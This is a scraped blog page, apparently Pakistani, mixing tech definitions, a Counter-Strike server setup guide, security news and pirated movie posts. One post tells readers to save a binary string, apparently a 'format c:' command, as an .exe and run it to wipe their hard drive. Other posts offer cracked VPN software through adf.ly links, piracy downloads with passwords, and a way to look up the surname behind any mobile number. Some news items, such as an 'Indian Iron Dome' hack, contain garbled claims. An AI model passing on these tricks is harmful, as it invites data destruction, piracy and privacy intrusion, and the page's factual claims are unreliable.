Blogger Widgets

Computer

Computer is an Electronic Machine which receives input from user, stored it, proceed it and give output which is useful for mankind. Modern computers are electronic and digital. The actual machinery -- wires, transistors, and circuits -- is called hardware; the instructions and data are called software.

Network

A network is a group of two or more computer systems linked together. There are many types of computer networks, Including Local-area networks (LANs), Wide-area networks (WANs), Campus-area networks (CANs), Metropolitan-area networks MANs), home-area networks (HANs)

News

News has two priorities: it must be current, and it must mean something to people. A story about the environment and a story about the Oscars can both be newsworthy, for different reasons. On the surface at least, the objective of news is to inform the audience. It's the job of all the news media to tell people what's going on in their community - locally, nationally or globally. In this sense, the news media provide a valuable public service.

Mobile Prices

A mobile phone (also known as a cellular phone, cell phone and a hand phone) is a device that can make and receive telephone calls over a radio link whilst moving around a wide geographic area. It does so by connecting to a cellular network provided by a mobile phone operator, allowing access to the public telephone network. By contrast, a cordless telephone is used only within the short range of a single, private base station.

Wallpapers

On a computer that is provided with a desktop kind of user interface, wallpaper is the background pattern or picture against which desktop menus, icons, and other elements are displayed and moved around. A wallpaper image can be in a JPEG or a GIF file format.

Social WEB

How To Make A Counter Strike 1.6 Server In PTCL In Pakistan

In this article i am going to show you how to run counter strike 1.6 server and run it on PTCL Broadband gameserver
First of All get your server ready

Step 1:

First of all set your ip address static for a lan GO to Control Panel click on Network And Sharing Center and then go to change adapter setting 
cs server 4 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)


Then go to your adapters properties
cs server 5 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
Then Go to ipv4 properties and give static ip like this
cs server 6 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
And
cs server 7 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)

Step 2: Get Your Server Ready

First go to counter strike 1.6 location usually like c:programfiles:counter strike 1.6 then runhlds.exe
cs server 1 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
Then Set Port like 27015-27016-27017 and Network to Internet
cs server 2 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
Then note Down Your IP and Port You had given
cs server 3 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)

Step 3 : Get your PTCl Bradband Ready

Go to Your Browser and write the address 192.168.1.1 Then give your name and passwordDefault Username and password is admin for both
ptcl 1 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
Then go to Advanced Setup and then go to NAT and click on Add
ptcl 2 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
And Then in Select a Service Select Half life Server
ptcl 3 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
And then in Server IP Address write your IP that you had given in ipv4 setting of adapter and write your port number in all the boxes of port that you have given in starting the server from hlds.exe and set the protocol to TCP/UDP And then Save it
ptcl 4 How to Make Counter Strike 1.6 Server  in Pakistan (For PTCL Broadband)
Thats It!  Now Your Counrter Strike 1.6 Server is Running on Internet
Go to google.com write whatismyip note your ip and tell your ip with port number to your friends and play online
Thank You!!!!

NSA Chief, General Alexander defends US surveillance programs as a Noble Mission

NSA Chief, General Alexander defends US surveillance programs as a Noble Mission
On Wednesday, Chief of National Security Agency (NSA), General Keith Alexander defended US surveillanceprograms as part of a Noble Mission to protect the nation.
He said that the collection of bulk phone records by U.S. Intelligence agencies are essential to preventing terrorist attacks. He referenced the criticism thrown at the intelligence services in late 2001 for not connecting the dots that led up to the Sept. 11 attacks.

We need our nation to understand why we need these tools, and what those tools mean for civil liberties and privacy and what they mean to defend this country,” General Keith Alexander said during a keynote speech at the Billington Cyber Security Summit in Washington.

In recent months NSA has been targeted for severe criticism from privacy advocates, members of Congress and foreign allies of America, whose citizens may have been targets of this surveillance.

Alexander pleaded for support of NSA programs during his speech at the conference, "This is not by accident. It's by a lot of hard work," he told. "Twenty-two cryptologists lost their lives in Iraq and Afghanistan. They're the heroes, not the (people behind) media leaks."

Alexander did not mention Snowden by name, simply calling him "the leaker" adding that "we trusted him and he betrayed our trust. That won't happen again. That doesn't make him a hero."

Alexander appealed to the public to support the surveillance effort, which is coming under scrutiny in Congress, and argued that the facts about the programs have been distorted.

Alexander also defends the Tech companies like Google and Microsoft. He said that companies are not driving up to the NSA and dumping data. They’re doing what the courts are directing them to provide.

Second iOS 7 Lockscreen vulnerability lets intruders to make calls from locked iPhone

Second iOS 7 Lockscreen vulnerability lets intruders to make calls from locked iPhone
Just two days back Apple has yet fixed a security flaw in iOS 7 that allows anyone to bypass the lock screen to access users’ personal data and the next one has already appeared.

The new vulnerability was discovered by Karam Daoud, a 27 year old from the West Bank city of Ramallah in Palestine, that allows anyone to make calls from a locked iPhone, including international calls and calls to premium numbers.
In a video, Daoud showed that calls can be made to any number from a locked iPhone running iOS 7 by using a vulnerability in the device’s emergency calling function.

The person needs to dial a number and then rapidly tap the call button until an empty screen with an Apple logo appears and makes the call to the particular number.
The Forbes writer tested the flaw on two iPhone 5 devices on separate networks and it worked both times. This is the second malfunction found in the lock screen since iOS 7 was seeded to all iPhone owners this past Wednesday.

Daoud notified Apple about the bug and received a same response that the next software update will fix this bug as well.

Update (5:02 PM Thursday, September 26, 2013 GMT) : Apple has just released iOS 7.0.2, a new update delivering several changes including a fix for a lock screen passcode vulnerability.

Mobius (2013) BRRip 650MB

Mobius (2013) BRRip 650MB
Story Line:
An FSB officer falls in love with his agent, an American woman, who works as a trader in a Russian bank.
                                            CLICK HERE TO Get links
                                               Password : 300mbfilms

Iron Man 3 (2013) 720p HDTV 775MB

Iron Man 3 (2013) 720p HDTV 775MB



Story Line:
Marvel’s “Iron Man 3″ pits brash-but-brilliant industrialist Tony Stark/Iron Man against an enemy whose reach knows no bounds. When Stark finds his personal world destroyed at his enemy’s hands, he embarks on a harrowing quest to find those responsible. This journey, at every turn, will test his mettle. With his back against the wall, Stark is left to survive by his own devices, relying on his ingenuity and instincts to protect those closest to him. As he fights his way back, Stark discovers the answer to the question that has secretly haunted him: does the man make the suit or does the suit make the man?
                                              CLICK HERE TO Get links
                                                      Password: 300mbfilms

Trick To Boost Torrent Speeds Using UTorrent Turbo Booster Plugin

uTorrent Turbo Booster is a recent plug-in designed to improve the functionality of probably the most popular P2P file sharing application around – uTorrent.
This tool comes equipped with modern technology that aims at getting your download speed way up so you can grab the files you want so badly much quicker than you’ve been used to. Movies, music, games, applications, you name it - uTorrent Turbo Booster will deliver at a fast pace. It will be there doing its job in the background without upsetting any other activity you might perform on your computer.

So Now Click On Given below Link For Download  UTorrent Turbo Booster Plugin

Get 1 Year Elite Hotspot Shield by Anonymous (2013)

Hss Elite by soldier4pakistan



1st Trick !

Go there & follow the steps 1st create account & get 1 year elite for free !
                                             LINK :  http://adf.ly/Na8tw 

2nd Trick ! 

Download hotspot shield then down this 

Chrome users install this extension:
                                     LINK : http://adf.ly/Na90K
`
Mozila user add this addon  :
                                    LINK : http://adf.ly/Na94z

Format your hard drive using notepad !!!

1. Open notepad and type this in.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000
2. Press "Save As"

3. type whatever you want, but change the file extension to .exe

4. save it somewhere. now open it

Your hard drive will be formatted!

Try it On your own risk
Enjoy!!!!!!!!!!! 

Find Out Your Electroral Area Through SMS – ECP Voter Verification System(Pakistan)


As the General Elections 2013 draw near, everyone’s becoming more and more politically aware of which part to vote for, in order to use their right to choose the country’s future but many people do not know which constituency/electoral area they belong. The Election Commission of Pakistan (ECP), for this reason, had long ago, created a SMS voter verfication serviced that needs to be reminded of, as elections draw near. It only involves two short steps, out of which, only one has to be executed from your (the voter’s) end, the other involve’s ECP’s reply. Here’s what to do:
Step 1: Send the SMS Text :
Compose a text message that comprises your NIC number (without any hyphen/dashes/spaces) and send it to 8300.
image
Step 2: Receive The Information:
image (1)
As soon as you end up doing step 1, in a few seconds time, you’ll receive an automated reply from ECP’s SMS server, that’ll contain your name and complete information regarding your electoral area; village, city, district and the serial number of vote registered that is, all in Urdu.
Every Pakistani, anywhere in the country, on any teleom carrier can avail this freefacility. So go ahead and find out our electoral area!

Pakistan Election Commission Website Faces Cyber Attacks


imagesPakistan Election Commission Website was under Cyber Attack, ”Data of our website is not stolen and our IT Experts have designed the system which is difficult to breach” says Election Commission of Pakistan.
29th March 2013 at 8:00 PM (PST) when IT Team of Election Commission Of Pakistan was uploading the data of the overseas Pakistanis they found they have been attacked.
Currently the Nature of the attack is unknown, Election Commission stated that the attack was launched from two countries. They have further stated that attackers also sent an email  (name of the countries and content of the email is still not declared by ECP)
The Election Commission statement says that the we are transferring our Data to new Server, Once the Process is Completed, the Website will be Live once again. Currently the Website is Down.

Chinese Hackers Downed Indian Defense System .... !!!


The famous reporting news channel of India, “Times of India” has claimed that Chinese hackers have breached their powerful security network system and stolen top secret files from there. This is the Indian Defense System where the security breach took place which was acknowledged as the most secure system in the whole world. The hacking process has been successful which resulted in major Indian missile and armament systems may have been compromised.
According to the reports of Times of India, the cyber attack has resulted in the leakage of “Shakti” (the newly introduced advanced artillery combat and control system of the Indian Army) and the latest mobile defense system called the Iron Dome. These leaks were observed during the first week of March 2013. The researchers of Canada and America at the University of Toronto have published their findings in the form of a report called ’Shadow in the Clouds’.
The report discussed concisely about the operations being carried out by the cyber network of China, this group of hackers is known by the moniker ‘Shadow Network’. The ‘Shadow Network’ has stolen the top secret files of the Indian government.
There is notion that operations, recent cyber attacks held in United States are also made by the same organization working in China. Researchers have also declared that these Chinese cyber spies have also tapped into the Indian embassies in Belgium, Serbia, Germany, Italy, Kuwait and the United States. The files hacked by the Chinese may be due aimed to evaluate the Indian government’s affairs with other countries throughout the world. Further investigations confirmed that these cyber attacks were made out from the servers located in China. The report has declared in their statement that the attack has compromised Indian Defense System, Business, Academic and Government Systems.
Chinese Hackers Broke Into Indian Navy's Computer System
Earlier this year, the US government claimed that they have averted an attack on US defense system by the Chinese hackers.

Largest Cyber Attack In The History Of World


The CNN reported that the world’s Largest Cyber Attack is happening right now, If you are using an internet connection and it is showing you a lack of performance in speed and efficiency then the problem is not with your laptop, computer, or some sort of Trojan that is affecting the speed of internet connection. But it is something which is happening at a global level and a lot of people living all around the world are affected badly. You can find the details of world’s largest cyber war happening, just scroll your mouse button down a bit.
The reports suggest that hackers usually utilize the DDoS technique to hack the websites and bring them down. Now what if I say you that this technique is utilized by top web hosting groups?
Largest Cyber Attack Yes, that’s 100 percent true. Recently a cyber war has started between a spam fighting group calledSpamhaus and a web hosting company called Cyberbunker.  The company Cyberbunker launched a massive DDoSattack on Spanhaus. The war was initially fueled by Spamhaus which is a nonprofit organization which black-listed many servers including Cyberbunker. In its revenge the Cyberbunker attacked Spamhaus.  Now this is a type of cyber attack which is much bigger as compared to any other attack ever happened or took place since the beginning of internet. Hence world has started to name it as “world’s largest cyber attack”. And it is happening right now, every time you are experiencing a slow internet connection today it is not because of any kind of technical problem.

The attack on Spamhaus which maintains a spam registry, black listing many spam servers, has been under fire. This attack is thought to be the largest DDoS attack in the history of the internet. Cyberbunker and various other web groups are utilizing different botnets in order counter attack who so ever poses a threat to their network. In Largest Cyber Attackthe attack started a week ago and now it has attained a great amount of tendency that it even slowed down the internet connection of every state.
This cyber attack on Spamhaus has attained a flat 300 billion bytes per second i.e. a massive 300 GBs per second. To make people understand you can view it as a Largest Cyber Attack which is five times more powerful than the recent cyber attacks performed on many major American banks.


No tension of any Virus now

Hide Your Work from Others (Family and Office)

Trick To Find User Surname Of Any Reliance Mobile Number


reliance number
While searching on web for findingdetails of user of particularmobile number, I came across awebsite that can help you to get little information about that user. In this tutorial i will teach you to find surname of Reliance mobile number user in few simple steps. Basically this website is for recharge but it helps you to get information about user of that mobile number. So lets dive into it.


   1. Go to this  Website
   2. Enter Mobile Number in Reliance Subscriber Number.
   3. Email address is optional so you don't need to enter.
   4. Done!!!

Posting Facebook Status Upside Down


facebook status upside down
In this tutorial i will share with you simple facebook status trick. If you want to post something creative or something cool as your facebook status then this trick will let you post any facebook status upside down. Basically this is a website which allows you to flip your text. so lets dive into it.

How To Do ?

  1. First GoTo FlipText Website by Clicking Here.
  2. Enter you message or text in text area and click on Flip.
  3. Copy the upside down text and paste it in your facebook status or where ever you want to use it.
  4. Enjoy!

Awesome VLC Media Player Trick


In this tutorial i will share a simple trick yet interesting trick i came across while surfing on the internet. I will call it VLC Inception trick. This trick is simple and works onwindows xp as well as windows 7. If you know this trick then its great if you don't then lets dive into it.

How To Do This Trick ?

  1. Open Vlc Media Player.
  2. Then Press Cltr + N
  3. Now Type "Screen://" (without quotes)
  4. Click on Play and watch this simple little trick.

Making Nameless Folder In Windows


creating nameless folder
In this small tutorial i will show you a smilpe windows trick. Basically you can not make folder with no name on windows. This trick will allow you to make folder without any name. This trick works on any windows  operating system.

How To Make Nameless Folder

Before attempting this trick, try to make a folder with no name and you will fail to do so. This is what this trick will let you do. Below is screenshot of folder before and after doing this interesting trick.
creating nameless folder
  1. Make a Newfolder on desktop or where ever you want.
  2. Right click on this newly created folder and select Rename.
  3. Erase the text showing "New Folder".
  4. Now keep Pressing Alt (i.e alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
  5. After that leave alt key and Press enter.
  6. Done you just created nameless folder.

Talaash (2012) 720p DvDRip 825MB


Talaash (2012) 720p DvDRip 825MB

Story Line:
The film opens with a car driving by the sea drive, which all of a sudden, screeches to a halt and turns randomly, to break the sidewalk, and fall into the sea. Next day, enter Inspector Surjan Singh Sekhawat, who is the investigating officer. A simultaneous plot reveals that he and his wife are coping with some personal loss of losing their only child, Karan. They have moved to their new home in Mumbai, where, his wife, Roshni is finishing with the unpacking. The doorbell rings, and she find out that it is an elderly lady, who introduces herself as Franny. She asks for some tea, and while Roshni is away into the kitchen, she rummages through the yet unpacked boxes, and finds a family photograph, where she addresses the dead child by his name, and seems happy. Meanwhile, Surjan encounters a sex worker named Rosie, who can shed some light upon the entire mystery.
http://www.imdb.com/title/tt1787988/
[FORMAT]:………………………….:[ Matroska
[FILE SIZE]:……………………….:[ 825 MB
[NO OF CDs]:……………………….:[ 1
[RESOLUTION]:………………………:[ 1280×544
[LANGUAGE ]:……………………….:[ Hindi
[SUBTITLES]:……………………….:[ Muxed-English
[RELEASE RUNTIME]:………………….:[ 2h 16min
[SOURCE]:…………:[ DVD9-DDR
[Encoder]:…………………………:[ nItRo



                                                                       Links

                                                                      Password

                                               300mbfilms